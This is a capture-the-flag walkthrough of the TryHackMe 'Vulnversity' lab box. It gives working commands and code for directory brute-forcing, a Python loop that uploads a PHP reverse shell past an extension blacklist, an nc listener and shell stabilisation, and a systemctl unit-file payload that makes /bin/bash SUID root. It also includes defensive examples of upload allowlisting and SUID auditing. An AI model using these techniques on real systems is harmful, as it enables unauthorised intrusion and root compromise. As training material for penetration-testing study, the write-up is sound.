TryHackMe - Vulnversity

Learn about active recon, web app attacks and privilege escalation.

Intro

I recently subscribed to TryHackMe so I could have access to their hackable boxes and preparation paths. Vulnversity is the first actual exploitation room on the OSCP preparation path. OSCP, or Offensive Security Certified Professional, is an ethical hacking certification that I will be aiming for in the near future, so this room seemed like the perfect place to start.

I will be using Kali Linux to solve this box, but any system can be used provided it has all the required tools. gobuster was not present on my default Kali install, so if it is missing run sudo apt install gobuster.

Make sure to check out TryHackMe!


Vulnversity Writeup

[Task 1] Deploy the machine

This task is just a setup task, so just deploy the machine and wait for it to come online. Also, connect to the provided OpenVPN configuration so you can access the deployed server (or just use the Kali box provided).

[Task 2] Reconnaissance

This task requires you to do simple recon on the box, which is easily done with nmap (Network Mapper). Scan the box using nmap -sV <IP>; the -sV flag probes each open port for its service and version, which is what the squid question below needs. Using this information, we can answer the following questions.

Question: Scan the box, how many ports are open?

Answer: 6

Question: What version of the squid proxy is running on the machine?

Answer: 3.5.12

Question: How many ports will nmap scan if the flag -p-400 was used?

Answer: 400

(-p-400 is shorthand for -p1-400, i.e. scan every port from 1 up to 400)

Question: Using the nmap flag -n what will it not resolve?

Answer: DNS

(-n disables reverse DNS resolution of the scanned hosts; you can confirm this in the nmap man page)

Question: What is the most likely operating system this machine is running?

Answer: Ubuntu

Question: What port is the web server running on?

Answer: 3333

[Task 3] Locating directories using GoBuster

Now that we know the web server is running on port 3333, we can view it in our browser. Navigate to IP:3333 in a web browser to see the site.

Investigating the website yields nothing of use. The next step is to use gobuster to brute-force the website for directories that are not linked from the front page. Make sure gobuster is installed. The wordlist I used is one that ships with Kali Linux, specifically /usr/share/wordlists/dirbuster/directory-list-1.0.txt.

Run the command gobuster dir -u http://IP:3333/ -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt to scan the website.

From the scan we see an interesting URL, /internal. Navigating to that URL on the website brings us to the internal page.

/internal brings us to a page where we can upload files! Now, if we can find some way to upload a reverse shell, we can gain code execution on the box. My first instinct with an apparently unrestricted file upload is to try and upload a PHP reverse shell, and indeed, this is what we need to do to compromise the web server.

Question: What is the directory that has an upload form page?

Answer: /internal/

[Task 4] Compromise the webserver

I first try to upload a PHP reverse shell. A good one is located here, but make sure to change the IP to your address on the VPN (check with ip addr) and the port to the one you will listen on. However, upon attempting to upload the .php file, the form tells me that the extension is not allowed.

The task description gives us a hint, telling us to use Burp Suite and a list of alternative PHP extensions. The hope is that the filter is a blacklist of file extensions rather than an allowlist, so one of these alternatives might slip past it and still be executed by the server's PHP handler.

I know how to use Burp Suite, so I wanted to try another way to discover any alternative extensions. Make sure your reverse shell code is placed in revshell.php. I wrote the following Python script using the requests module; it uploads the same payload once per candidate extension and reports the ones the form does not reject.

import requests

# Extensions to try: ".php" is refused outright, so probe the aliases that
# the server's PHP handler may also execute.
extensions = [".php", ".php3", ".php4", ".php5", ".phtml"]
url = "http://10.10.49.64:3333/internal/"   # the box's upload form
code = "revshell.php"                       # local copy of the reverse shell

for ext in extensions:
    name = f"revshell{ext}"
    # Binary mode so the payload is sent byte-for-byte.
    with open(code, "rb") as fh:
        files = {"file": (name, fh)}
        r = requests.post(url, files=files, timeout=10)
    # The form answers "Extension not allowed" for blocked types.
    if "not allowed" not in r.text:
        print(f"Found extension: {ext}")

Running this script reports that .phtml is a valid extension! Because the script really uploads each candidate, the accepted copy is already on the server: navigating to http://ip:3333/internal/uploads shows my reverse shell file sitting in the uploads directory.
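To make the blacklist-versus-allowlist point concrete, here is an added example (my own code, not part of the original writeup or of the box) that models the two kinds of check side by side. The blocklist is reconstructed from what the probe above observes (.php refused, .phtml accepted); the real server-side code is not on the page, so that model, the allowlist contents and the probe_filters helper are assumptions. It runs offline and sends nothing.

```python
import os
import re

# Model of the box's filter, reconstructed from what the probe observed:
# ".php" is refused and ".phtml" is accepted. Assumption: only the final
# extension is compared against a blocklist.
BLOCKED_EXTENSIONS = {".php"}

# What a hardened handler does instead: allow a short list of benign types.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def last_extension(filename):
    """Return the final extension of filename, lower-cased ('' if none)."""
    return os.path.splitext(filename)[1].lower()


def blacklist_accepts(filename):
    """Vulnerable check: anything not on the blocklist is accepted.

    Only the last extension is inspected, so ".phtml", ".php5" and friends
    sail through even though the PHP handler may execute them.
    """
    return last_extension(filename) not in BLOCKED_EXTENSIONS


def allowlist_accepts(filename):
    """Hardened check: one benign extension, a plain stem, no path parts."""
    if os.path.basename(filename) != filename:
        return False                      # "../x.png" and "dir/x.png" rejected
    # Exactly one dot, so "shell.php.png", NUL bytes and spaces all fail.
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}", filename):
        return False
    return last_extension(filename) in ALLOWED_EXTENSIONS


def probe_filters(stem, extensions):
    """Offline version of the probing loop: per extension, report whether
    each filter would accept the file. Nothing is sent anywhere."""
    return {
        ext: {
            "blacklist": blacklist_accepts(stem + ext),
            "allowlist": allowlist_accepts(stem + ext),
        }
        for ext in extensions
    }


if __name__ == "__main__":
    candidates = [".php", ".php3", ".php4", ".php5", ".phtml"]
    for ext, verdict in probe_filters("revshell", candidates).items():
        print(f"{ext:7} blacklist={verdict['blacklist']!s:5} "
              f"allowlist={verdict['allowlist']}")
```

Even the allowlist is only half the fix: uploads should also be renamed server-side and stored where the web server will not execute scripts, because with Apache's AddHandler a name like shell.php.png can still be handed to the PHP module regardless of what the upload form accepted.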

Now, I set up a listener on my own computer using nc. I ran nc -lvp 1234, which listens on port 1234 for any incoming connection. Then I opened the .phtml file in the uploads folder in my browser, the server executed it, and a reverse shell was obtained!

To stabilize the shell, I ran python -c "import pty; pty.spawn('/bin/bash')", which allocates a pseudo-terminal and gives me a far more usable shell (tab completion, no more commands dying on Ctrl-C).

With my new shell access, I cat /etc/passwd and see that the main user on this box is named bill; running whoami in the shell confirms the web server itself is running as bill. I then navigate to /home/bill to read out his user flag and solve this task.

Question: Try upload a few file types to the server, what common extension seems to be blocked?

Answer: .php

Question: Run this attack, what extension is allowed?

Answer: .phtml

Question: What user was running the web server?

Answer: bill

Question: What is the user flag?

Answer: 8bd7992f...

[Task 5] Privilege Escalation

To compromise the machine fully, I have to find a SUID (set-user-ID) binary owned by root that I can exploit. A SUID binary runs with its owner's effective user ID no matter who executes it, so a root-owned one that can be coaxed into running arbitrary commands gives me root privileges and, with them, the root flag.

Running find / -type f -perm -4000 2>/dev/null > suid.txt gives me a list of SUID binaries on the box (the 2>/dev/null drops the permission-denied noise from directories bill cannot read). Comparing this list with the list of SUID binaries on my own system, /bin/systemctl stands out. On my own system, /bin/systemctl doesn't have the SUID bit, but it does on the box. This immediately feels off.
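The baseline comparison above is worth automating, since on a real engagement the SUID list is long. The following is an added example of mine, not code from the original writeup: find_suid walks the filesystem the way the find command does (skipping pseudo-filesystems and unreadable directories), and unexpected_suid diffs the result against a known-good list. The sample lists are constructed for the demo, not captured from the box, and are an assumption about what a stock Ubuntu install carries.

```python
import os
import stat

# Pseudo-filesystems and device directories: nothing useful there, and
# walking them is slow.
SKIP_PREFIXES = ("/proc", "/sys", "/dev", "/run")


def find_suid(root="/"):
    """Return sorted paths of regular files under root with the set-user-ID bit.

    Symlinks are not followed and unreadable directories are skipped
    silently, the equivalent of find's 2>/dev/null.
    """
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        if dirpath.startswith(SKIP_PREFIXES):
            dirnames[:] = []              # prune the whole subtree
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(target, baseline):
    """SUID paths present on the target box but absent from a known-good baseline."""
    return sorted(set(target) - set(baseline))


# Constructed sample data (assumed, not captured from the box): a typical
# stock SUID set, and the same set plus the odd entry this room plants.
BASELINE_SUID = [
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/umount",
    "/usr/bin/chsh", "/usr/bin/passwd", "/usr/bin/sudo",
]
TARGET_SUID = BASELINE_SUID + ["/bin/systemctl"]

if __name__ == "__main__":
    # On a real box: unexpected_suid(find_suid("/"), baseline_from_clean_install)
    for path in unexpected_suid(TARGET_SUID, BASELINE_SUID):
        print("unexpected SUID binary:", path)
```

Take the baseline from a clean install of the same distribution and release; an entry missing from the baseline is a lead, not proof, and still needs a GTFOBins lookup or manual review.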

GTFOBins is a curated list of Unix binaries that can be abused for privilege escalation, grouped by the privilege each one holds (SUID, sudo, capabilities and so on). Searching for systemctl shows a SUID entry: systemctl will link and start an arbitrary unit file, and the unit's ExecStart command runs as root. I now have an exploit. The simplest payload is to give bash the SUID bit with chmod +s /bin/bash. Once bash is SUID root, bash -p starts a shell that keeps root as its effective user (without -p, bash notices that the effective and real uid differ and drops the privileges).

Modifying the exploit to target /bin/systemctl on the server leaves me with this:

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/bash -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

Running this script and checking the permissions of bash with ls -lah /bin/bash shows that bash was successfully given the SUID bit! Now, running bash -p and then id shows me that I have the effective user id (euid) and the effective group id (egid) of root.

With root privileges, I can navigate to /root/ and read root.txt.

Question: On the system, search for all SUID files. What file stands out?

Answer: /bin/systemctl

It's challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer?

Become root and get the last flag (/root/root.txt)

Answer: a58ff857...


Conclusion

All in all, a pretty simple and easy challenge.
